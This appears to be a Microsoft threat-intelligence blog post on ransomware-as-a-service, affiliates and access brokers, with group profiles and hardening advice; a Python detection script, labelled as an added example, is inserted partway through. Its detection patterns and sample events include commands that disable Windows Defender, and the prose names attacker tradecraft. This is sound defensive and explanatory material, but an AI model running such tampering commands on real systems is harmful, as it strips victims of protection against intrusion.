We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2019t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. 
Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. 
This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. 
\n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. 
The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services.\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. In reality, the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. 
Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it, in order to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as a specific attack on the target\u2019s network; instead, it takes the form of purchasing access from an access broker or using an existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain that culminate in intentional business disruption and extortion. 
Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. 
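The reconnaissance-then-tampering sequence described above is a useful correlation target for a SOC: enumerating privileged groups, domain controllers or Group Policy, querying which security services are running, and then disabling them are each noisy on their own, but they rarely occur together from one account on one host within a few minutes. The script below is an added example, not code from Microsoft or from the original post. It runs a simple per-host, per-account correlation over a handful of constructed process-creation events (the hosts, accounts, timestamps and command lines are hypothetical, written to mirror the behaviour the paragraph describes) and scores a security-tool tampering command higher when distinct reconnaissance steps preceded it in a short window. The command-line patterns are illustrative rather than a complete signature list; real RaaS tooling varies, and where tamper protection is enabled the Set-MpPreference call in the sample would fail rather than succeed, which is itself worth alerting on.

```python
"""Correlate reconnaissance followed by security-tool tampering per host and account.

Added example; hosts, accounts, timestamps and command lines below are constructed
to mirror the behaviour described in the text, not real telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Reconnaissance an operator runs before deciding how to proceed: who am I,
# who are the privileged users, which DCs exist, what Group Policy applies,
# and which security services are running. Patterns are illustrative only.
RECON_PATTERNS = [
    (re.compile(r"\bwhoami\b.*/(groups|priv)", re.I), "privilege enumeration"),
    (re.compile(r"\bnet\s+(group|localgroup)\b.*admin", re.I), "admin group enumeration"),
    (re.compile(r"\bnltest\b.*/(dclist|domain_trusts)", re.I), "domain enumeration"),
    (re.compile(r"\bgpresult\b", re.I), "Group Policy enumeration"),
    (re.compile(r"\b(sc\s+query|tasklist|Get-MpComputerStatus)\b", re.I), "security tool enumeration"),
]

# Tampering with the security products found during recon.
TAMPER_PATTERNS = [
    (re.compile(r"Set-MpPreference\b.*-Disable\w*", re.I), "Defender feature disabled"),
    (re.compile(r"\b(sc\s+(stop|config)|net\s+stop)\s+(WinDefend|Sense|MsMpSvc)\b", re.I),
     "security service stopped or disabled"),
    (re.compile(r"\btaskkill\b.*/im\s+(MsMpEng|MsSense|SenseIR)", re.I), "security process killed"),
]

# Constructed process-creation events (4688 / Sysmon 1 shape): hypothetical data.
SAMPLE_EVENTS = [
    {"ts": "2022-05-09T10:00:05", "host": "FS01", "user": "CORP\\svc_backup", "cmd": "whoami /groups"},
    {"ts": "2022-05-09T10:00:40", "host": "FS01", "user": "CORP\\svc_backup", "cmd": 'net group "Domain Admins" /domain'},
    {"ts": "2022-05-09T10:01:10", "host": "FS01", "user": "CORP\\svc_backup", "cmd": "nltest /dclist:corp.local"},
    {"ts": "2022-05-09T10:02:00", "host": "FS01", "user": "CORP\\svc_backup", "cmd": "sc query WinDefend"},
    {"ts": "2022-05-09T10:03:30", "host": "FS01", "user": "CORP\\svc_backup",
     "cmd": 'powershell -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"ts": "2022-05-09T10:04:00", "host": "FS01", "user": "CORP\\svc_backup", "cmd": "sc config WinDefend start= disabled"},
    # A lone gpresult from a help-desk admin: recon-shaped, but nothing follows it.
    {"ts": "2022-05-09T11:30:00", "host": "WS22", "user": "CORP\\jdoe", "cmd": "gpresult /r"},
    {"ts": "2022-05-09T12:00:00", "host": "WS22", "user": "CORP\\jdoe", "cmd": "notepad.exe report.txt"},
]


def classify(cmd):
    """Return ("tamper", label), ("recon", label) or None for one command line."""
    for rx, label in TAMPER_PATTERNS:
        if rx.search(cmd):
            return ("tamper", label)
    for rx, label in RECON_PATTERNS:
        if rx.search(cmd):
            return ("recon", label)
    return None


def detect(events, window=timedelta(minutes=30), min_recon=2):
    """Score each tampering command by the distinct recon categories the same
    host+account ran in the preceding window: HIGH when >= min_recon, else MEDIUM.
    Recon on its own is never alerted on; it is far too common for admins."""
    by_actor = defaultdict(list)
    for ev in events:
        cls = classify(ev["cmd"])
        if cls:
            by_actor[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["ts"]), cls, ev["cmd"]))
    findings = []
    for (host, user), seq in by_actor.items():
        seq.sort(key=lambda item: item[0])
        for i, (ts, (kind, label), cmd) in enumerate(seq):
            if kind != "tamper":
                continue
            recon = {lbl for t, (k, lbl), _ in seq[:i] if k == "recon" and ts - t <= window}
            findings.append({
                "host": host, "user": user, "time": ts.isoformat(),
                "tamper": label, "command": cmd, "preceding_recon": sorted(recon),
                "severity": "high" if len(recon) >= min_recon else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], f["user"], f["time"], f["tamper"], f["preceding_recon"])
```

Run as a script it prints two HIGH findings for the constructed FS01 sequence and nothing for the lone gpresult on WS22. In a real pipeline the event list would come from Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1, keyed by the same host and account fields; the window and threshold are the knobs to tune against your own admin baseline.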
\n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. 
Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attacker is DEV-0537 (also known as LAPSUS$), which is profiled below.\n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. 
Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privileged access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access and hands-on-keyboard deployment can vary wildly depending on the groups and their workloads or motivations. 
Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware-associated threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond and evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. 
In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. 
We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHORUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV stage. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, BazaLoader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti, as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today.\n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. 
Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. 
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020, ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and REvil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. 
The tendency to report on ransomware incidents based on payload and attribute them to a monolithic gang often obfuscates the true relationship between the attackers, which is certainly true of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. In April 2022, ELBRUS was also observed abusing CVE-2021-31207 in Exchange to compromise organizations, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low-privileged user credentials into highly privileged access as SYSTEM on an Exchange Server.\n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. 
DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. 
Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.

### DEV-0237: Prolific collaborator

Like DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.

After the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn’t want Hive’s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.

_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_

Beyond RaaS payloads, DEV-0237 also uses the cybercriminal gig economy to gain initial access to networks. DEV-0237’s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups rather than performing their own initial compromise and malware development.

_Figure 5. Examples of DEV-0237’s relationships with other cybercriminal activity groups_

Like all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.

### DEV-0206 and DEV-0243: An “evil” partnership

Malvertising, which refers to taking out a search engine ad that leads to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update or a software package to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed their settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double-clicks the script.

Once successfully executed, the JavaScript framework, also referred to as [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243.
DEV-0243 falls under activities tracked by the cyber intelligence industry as “EvilCorp.” The custom Cobalt Strike loaders are similar to those seen in the publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware’s inner payloads. In DEV-0243’s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.

Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the “EvilCorp” activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status.

_Figure 6. The handover from DEV-0206 to DEV-0243_

### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate

Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)

DEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, ManageEngine ADSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they prefer, DEV-0401 gains elevated credentials at the initial access stage of their attack.

Once inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.

_Figure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022_

